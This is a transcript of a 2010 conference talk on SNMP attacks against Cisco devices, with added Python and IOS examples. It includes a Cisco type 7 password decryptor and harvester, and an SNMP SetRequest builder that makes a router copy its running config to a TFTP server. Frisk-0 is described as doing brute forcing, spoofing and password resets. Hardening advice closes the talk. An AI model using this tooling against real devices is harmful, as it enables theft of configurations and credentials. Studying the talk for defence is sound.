SNMP : Simple Network Mediated (Cisco) Pwnage
Presentation by Georg-Christian Pranschke (SensePost) at ZaCon 2 in 2010.

This presentation is about SNMP security. It begins with an overview of SNMP, then covers SNMP's security weaknesses and SNMP security on Cisco appliances, in particular how a known read/write community string gives configuration-level access to the device. Frisk-0, a tool for SNMP hacking developed by the presenter, is also discussed.

SNMP : Simple Network Mediated (Cisco) Pwnage Presentation Transcript

  • 1. SNMP: Simple Network Mediated (Cisco) Pwnage. Georg-Christian Pranschke, 9 October 2010
  • 2. `whoami`: george@sensepost.com, "Cheorchie"
  • 3. Agenda
    - How it all began…
    - SNMP?
    - SNMP from a Security Perspective
    - SNMP on Cisco Appliances
    - Exploiting SNMP Misconfigurations
    - Frisk-0
    - Secure your SNMP enabled devices
    - Questions
  • 4. A Long Time Ago…
  • 5. How it all began…
  • 6. SNMP ?
  • 7. SNMP?
    - Simple Network Management Protocol
    - Monitor and manage devices on the network: routers, switches, bridges, hubs, IP phones and cameras, printers, computers
  • 8. SNMP?
    - UDP: 161 (agent, queried by the manager) / 162 (traps sent to the manager)
    - Manager / Agent
    - Concepts: MIB (Management Information Base), OID (Object Identifier), PDU (Protocol Data Unit)
    - Versions: 1 and 2c vs 3
  • 9. SNMP?
    - Community strings: think passwords; read-only / read-write
  • 10. SNMP from a Security Perspective
  • 11. SNMP from a Security Perspective
    - Plain-text protocol
    - UDP: spoofing
    - Get/Set requests and their responses contain the community string
    - Community strings: defaults (public, private, admin, snmp, snmpd …); weak communities (3 characters!); reuse; community schemes
    - User awareness
  • 12. SNMP from a Security Perspective
    - Information disclosure: internal IP addresses, routing information, running processes, running services, installed software, usernames, hardware
    - Compromise
  • 13. Cisco
  • 14. Cisco Appliances: management interfaces SNMP, TELNET, SSH, HTTP
  • 15. Brute Forcing Cisco Appliances
    - TELNET: often only a password required; only three tries, then reconnect; the enable password needs to be brute forced as well
    - SSH: needs username and password (ssh -1); only three tries per connection; the enable password needs to be brute forced as well
    - HTTP(S): Basic Authentication; fastest so far; no enable password
  • 16. Brute Forcing Cisco Appliances
    - SNMP: almost as fast as we can send UDP packets! Just the community string is needed! Privileged access to the device!
  • 17. SNMP on Cisco Appliances
    - Remote configuration through SNMP: setting OIDs
    - Configuration uploads and downloads via TFTP
    - Running config vs startup config
  • 18. The Vigenère Cipher
    - Variation of a Caesar cipher (Cisco's type 7 "service password-encryption" uses it with a fixed, publicly known key)
    - Why such a weak cipher? Obfuscation at best
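The type 7 reversal the slide alludes to, and which Frisk-0 automates over downloaded configurations, as an added example written for this page (it is not Frisk-0 code and not from the talk). The 40-character key is the one Cisco IOS uses; the sample configuration lines are constructed for the example, and the `harvest_type7` line pattern is an assumption about which config keywords precede a type 7 value.

```python
import re

# Cisco "type 7": a Vigenere-style XOR against this fixed, public 40-byte key.
# The first two characters of a stored value are a decimal seed (IOS emits 0..15)
# giving the starting offset into the key; the rest is the XOR output in hex.
XLAT_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def type7_decrypt(encoded: str) -> str:
    """Recover the plaintext from a type 7 string such as '094F471A1A0A'."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError("malformed type 7 string")
    seed = int(encoded[:2], 10)
    if not 0 <= seed < len(XLAT_KEY):
        raise ValueError("seed out of range")
    body = bytes.fromhex(encoded[2:])
    plain = bytes(c ^ XLAT_KEY[(seed + i) % len(XLAT_KEY)] for i, c in enumerate(body))
    return plain.decode("latin-1")


def type7_encrypt(plain: str, seed: int = 9) -> str:
    """Produce a type 7 string. IOS picks the seed itself; here it is a parameter."""
    if not 0 <= seed <= 15:
        raise ValueError("seed must be 0..15")
    data = plain.encode("latin-1")
    body = bytes(c ^ XLAT_KEY[(seed + i) % len(XLAT_KEY)] for i, c in enumerate(data))
    return f"{seed:02d}{body.hex().upper()}"


# Assumed pattern: a type 7 value follows "password 7", "key 7" or "secret 7".
# Type 5 (MD5) "enable secret" lines are deliberately left alone: not reversible.
TYPE7_RE = re.compile(r"^.*?(?:password|key|secret)\s+7\s+(?P<enc>[0-9A-Fa-f]{4,})$")


def harvest_type7(config_text: str) -> list[tuple[str, str]]:
    """Return (config line, recovered plaintext) for every type 7 value found."""
    found = []
    for line in config_text.splitlines():
        line = line.strip()
        m = TYPE7_RE.match(line)
        if m:
            found.append((line, type7_decrypt(m.group("enc"))))
    return found


# Constructed sample running-config fragment (not from a real device).
SAMPLE_CONFIG = """\
enable secret 5 $1$abcd$ConstructedNotARealHash00
enable password 7 094F471A1A0A
username ops password 7 0215575819031B
tacacs-server key 7 0215575819031B
snmp-server community public RO
"""

if __name__ == "__main__":
    for line, plain in harvest_type7(SAMPLE_CONFIG):
        print(f"{line!r} -> {plain!r}")
```

The `enable secret` line is the one that matters in practice: type 5 is a salted MD5 hash and has to be cracked, while every type 7 value in a downloaded config falls out instantly, which is why a read/write SNMP community that lets you pull the config is as good as the passwords themselves.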
  • 19. Exploiting SNMP Misconfigurations
  • 20. If the RW community is known…
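To make the protocol slides (7 to 12) and the configuration-copy slides (17 and 20) concrete, here is an added example of the actual bytes involved, written for this page in Python; it is not Frisk-0 and not code from the talk. It is a minimal SNMPv1 BER encoder/decoder that builds the SetRequest asking an IOS device to copy its running configuration to a TFTP server through CISCO-CONFIG-COPY-MIB (the column numbers and enumeration values are taken from that Cisco MIB), then decodes the message again to show that the community string sits in plain text inside every PDU. The row index 1000, the server address 192.0.2.10 and the file name are assumed values; nothing is sent on the network.

```python
# BER universal tags, SNMP IpAddress (application 0) and the SNMPv1 PDU tags.
INTEGER, OCTET_STRING, NULL, OID, SEQUENCE, IPADDRESS = 0x02, 0x04, 0x05, 0x06, 0x30, 0x40
GET_REQUEST, SET_REQUEST = 0xA0, 0xA3
# ccCopyEntry of CISCO-CONFIG-COPY-MIB; columns and enum values per that MIB.
CC_COPY_ENTRY = "1.3.6.1.4.1.9.9.96.1.1.1.1"
TFTP, NETWORK_FILE, RUNNING_CONFIG, CREATE_AND_GO = 1, 1, 4, 4


def _tlv(tag: int, body: bytes) -> bytes:
    """Tag-Length-Value; long-form length once the body reaches 128 bytes."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    ln = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(ln)]) + ln + body

def _int(v: int) -> bytes:
    n = (v.bit_length() + 8) // 8  # one spare bit keeps positive values positive
    return _tlv(INTEGER, v.to_bytes(n, "big", signed=True))

def _oid(dotted: str) -> bytes:
    parts = [int(p) for p in dotted.strip(".").split(".")]
    out = bytearray([40 * parts[0] + parts[1]])
    for sub in parts[2:]:                      # base-128, high bit = more to come
        chunk = [sub & 0x7F]
        while sub := sub >> 7:
            chunk.append(0x80 | (sub & 0x7F))
        out += bytes(reversed(chunk))
    return _tlv(OID, bytes(out))

def build_message(community: str, pdu_type: int, request_id: int, varbinds) -> bytes:
    """Message ::= SEQUENCE { version INTEGER(0), community OCTET STRING, PDU }."""
    vbl = b"".join(_tlv(SEQUENCE, _oid(oid) + value) for oid, value in varbinds)
    pdu = _tlv(pdu_type, _int(request_id) + _int(0) + _int(0) + _tlv(SEQUENCE, vbl))
    return _tlv(SEQUENCE, _int(0) + _tlv(OCTET_STRING, community.encode()) + pdu)

def get_request(community: str, oid: str, request_id: int = 1) -> bytes:
    return build_message(community, GET_REQUEST, request_id, [(oid, _tlv(NULL, b""))])

def config_copy_request(community: str, tftp_server: str, filename: str,
                        request_id: int = 1, row: int = 1000) -> bytes:
    """SetRequest creating one ccCopyEntry row: running-config -> TFTP server."""
    ip = bytes(int(o) for o in tftp_server.split("."))
    def col(c): return f"{CC_COPY_ENTRY}.{c}.{row}"
    varbinds = [
        (col(2), _int(TFTP)),                             # ccCopyProtocol
        (col(3), _int(RUNNING_CONFIG)),                   # ccCopySourceFileType
        (col(4), _int(NETWORK_FILE)),                     # ccCopyDestFileType
        (col(5), _tlv(IPADDRESS, ip)),                    # ccCopyServerAddress
        (col(6), _tlv(OCTET_STRING, filename.encode())),  # ccCopyFileName
        (col(14), _int(CREATE_AND_GO)),                   # ccCopyEntryRowStatus
    ]
    return build_message(community, SET_REQUEST, request_id, varbinds)

def _read(buf: bytes, pos: int):
    """Return (tag, body, next_pos) for the TLV starting at pos."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        k = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + ln], pos + ln

def _decode_oid(body: bytes) -> str:
    parts, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(val)
            val = 0
    return ".".join(map(str, parts))

def parse_message(raw: bytes) -> dict:
    """Decode an SNMPv1 message as anyone on the path can: no secret is needed."""
    tag, msg, _ = _read(raw, 0)
    if tag != SEQUENCE:
        raise ValueError("not an SNMP message")
    _, ver, p = _read(msg, 0)
    _, community, p = _read(msg, p)
    pdu_tag, pdu, _ = _read(msg, p)
    _, rid, p = _read(pdu, 0)
    _, _, p = _read(pdu, p)  # error-status
    _, _, p = _read(pdu, p)  # error-index
    _, vbl, _ = _read(pdu, p)
    varbinds, p = [], 0
    while p < len(vbl):
        _, vb, p = _read(vbl, p)
        _, oid, q = _read(vb, 0)
        vtag, val, _ = _read(vb, q)
        varbinds.append((_decode_oid(oid), vtag, val))
    return {"version": int.from_bytes(ver, "big", signed=True),
            "community": community.decode("latin-1"), "pdu": pdu_tag,
            "request_id": int.from_bytes(rid, "big", signed=True), "varbinds": varbinds}

if __name__ == "__main__":
    pkt = config_copy_request("private", "192.0.2.10", "r1-running.cfg")
    print(pkt.hex())           # the datagram; a caller would socket.sendto(pkt, (target, 161))
    print(parse_message(pkt))  # community 'private' is readable without any key
```

Swapping `RUNNING_CONFIG` for `startupConfig(3)` fetches the startup configuration instead, and reversing the source and destination types pushes a file from the TFTP server onto the device, which is the write half of the "rogue management interface" idea. Because the device fetches from or writes to whatever server address the SetRequest names, and UDP carries no proof of the sender, the TFTP side of this exchange is the reason the hardening slide asks for access-lists on TFTP and not only on SNMP.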
  • 21. Frisk-0
  • 22. The Lab Environment
  • 23. Frisk-0: "Rogue Management Interface"
    - Brute forces community strings
    - Downloads running and startup configurations
    - Extracts and decrypts all passwords and hashes
    - Batch mode: from a targets file, network ranges
    - Spoofing capabilities
    - "Configlets" (enable TELNET / reset passwords)
    - Fully automated and unattended
  • 24. Frisk-0
  • 25. The GREnd Finale: GRE (Generic Routing Encapsulation)
  • 26. Secure your SNMP enabled devices
  • 27. Secure Your SNMP Enabled Devices
    - Do you really need SNMP?
    - Do you really need a RW community?
    - Set strong community strings: 40+ characters? Why not!
    - Access-lists: SNMP; TFTP! (spoofing); UDP
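The hardening slide in IOS configuration form, as an added example written for this page (not configuration from the talk). The weak block is the kind of setup the brute-forcing slides target; the hardened block applies the slide's advice and, since slide 8 contrasts v1/2c with v3, adds an SNMPv3 user so the credential no longer crosses the wire in clear text. The management station address 192.0.2.10, the ACL and group names, and the long community string are placeholders; the passphrases must be replaced.

```cisco
! ---- Weak: default, guessable communities, a RW community, reachable from anywhere
snmp-server community public RO
snmp-server community private RW

! ---- Hardened
no snmp-server community public
no snmp-server community private
!
! Only the management station may talk SNMP to the device; everything else is logged.
ip access-list standard SNMP-MGMT
 permit 192.0.2.10
 deny   any log
!
! If v1/2c is still required: a long random RO community (placeholder value), bound to the ACL,
! and no RW community at all. Configuration changes go through SSH with AAA, not SNMP SETs.
snmp-server community Q7vH2kLp9sXe4mRt1wYz8bNc6aJd3fGu5hKo0iEr RO SNMP-MGMT
!
! Preferred: SNMPv3 with authentication and privacy, restricted by the same ACL.
snmp-server group NMS-GROUP v3 priv access SNMP-MGMT
snmp-server user nms NMS-GROUP v3 auth sha <auth-passphrase> priv aes 128 <priv-passphrase>
!
! TFTP: an outbound interface ACL does not filter packets the router itself originates,
! so restrict the device to the one sanctioned TFTP server on the upstream switch or firewall
! (UDP/69, host 192.0.2.10 only) and pin the source address the device uses for TFTP.
ip tftp source-interface Loopback0
```

Checking the result is as simple as running the brute-force step from the talk against the device from an address outside the ACL: with the ACL in place, no community string, however weak, answers from anywhere but the management station.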
  • 28. Questions ?